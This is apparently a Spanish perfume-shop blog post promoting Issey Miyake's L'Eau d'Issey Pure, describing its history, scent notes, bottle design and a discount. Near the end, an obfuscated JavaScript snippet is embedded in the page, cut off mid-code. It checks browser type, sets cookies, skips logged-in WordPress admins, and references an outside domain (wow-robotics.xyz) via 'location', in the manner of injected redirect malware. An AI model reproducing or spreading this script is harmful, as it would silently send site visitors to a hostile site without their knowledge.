IM_EIP_Tintin_1280x450

El diseñador japonés Issey Miyake explora todos los campos de la creatividad, provoca sorpresa con sencillez.

Por ello cuando en 1992, guiado por su imaginación y su visión de una naturaleza sublimada, Issey Miyake crea su primer perfume L’ Eau d’Issey de Issey Miyake: el “perfume más bello, el más puro del mundo: el perfume del agua sobre la piel de una mujer”.  En un primer momento, sorprende y luego, la suavidad familiar y la evidencia cautivan. El perfume L’Eau d’Issey nos conmueve con su sencillez.

En 2016, Issey Miyake confiere un nuevo aliento a L’Eau d’Issey y abre el segundo capítulo de su historia.

En el origen del perfume L’Eau d’Issey, hay una gota, solo una gota rara y preciosa.

El perfume L’Eau D’Issey Pure de Issey Miyake nace con las estaciones, que pasan cada vez más rápido, Issey Miyake retoma su amor por una naturaleza que se toma su tiempo, el tiempo de ponerse en movimiento, despertada por el agua.

 

Un perfume que se convierte en un agua creadora de momentos suspendidos, que nace y fluye apaciblemente,  paréntesis de sueño y evasión, instantes de serenidad y de plenitud, más allá del tiempo.

Transparente y, sin embargo, profunda. Fluida pero envolvente. L’Eau d’Issey Pure es rica en contrastes.

¿A qué huele L’Eau d’Issey Pure de Issey Miyake?

Encarnada por el aliento yodado de la molécula Maritima* asociada con el ámbar gris, L’Eau d’Issey Pure echa el ancla en una nueva historia acuática.

Maritima*, la molécula exclusiva de IFF, evoca las aguas limpias y frescas, mientras que el ámbar gris, con sus inflexiones minerales y animales, aporta sensualidad y generosidad a la fragancia.

Como flotando sobre la gran extensión salina, un ramo de flores resplandece. El muguete cristalino responde a la luminosidad de la flor de azahar. Nos sumergimos en su delicada estela blanca.
Luego, vienen otras flores más densas. La esencia de rosa damascena, aún cubierta por el rocío de la mañana en que fue recogida, trae consigo al opulento jazmín en una embriaguez de pétalos.
La travesía continúa. En las notas de fondo, resuena la llamada irresistible del Cashmeran*, colmado de vibraciones de almizcles y maderas.

Pura y poderosa, el perfume de mujer L’Eau d’Issey Pure evoca las riberas lejanas con el simple contacto de una gota.

* molécula cautiva IFF

ISM_2774_EI_PURE_2016_POS_ENG_TBD_1,00_300x300_mm_300x300_[96893]

 El frasco.

Una silueta esbelta, cónica e icónica, es el rasgo característico del famoso frasco de vidrio de L’Eau d’Issey.

La arquitectura del frasco del perfume L’Eau d’Issey Pure de Issey Miyake toma prestados sus principales códigos y su refinamiento, desde la sobriedad del vidrio al tapón de plata satinada. Con una sola excepción: la esfera cristalina, que orna su vértice, se desliza en el fondo del frasco de L’Eau d’Issey Pure. Un sesgo artístico querido por el diseñador estadounidense Todd Bracher, que ilustra este retorno al origen a través de una poesía sin manierismo.

 

“L’Eau d’Issey es todo lo que los demás perfumes no son. L’Eau d’Issey evoca una sencillez y pureza real en torno a esta noción del agua. Para L’Eau d’Issey Pure hemos capturado la imagen más simple del agua que, para mí, es la de una gota. La gota simboliza el perfume y se convierte en frasco”.

Todd Bracher

El perfume L’Eau d’Issey de Issey Miyake es absolutamente puro, desde la belleza del frasco, pasando por su fragancia única.

Esta semana descubre en Perfumes Tin Tin  hasta el 30% de descuento en los productos de Issey Miyake hasta el 12 de Julio.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone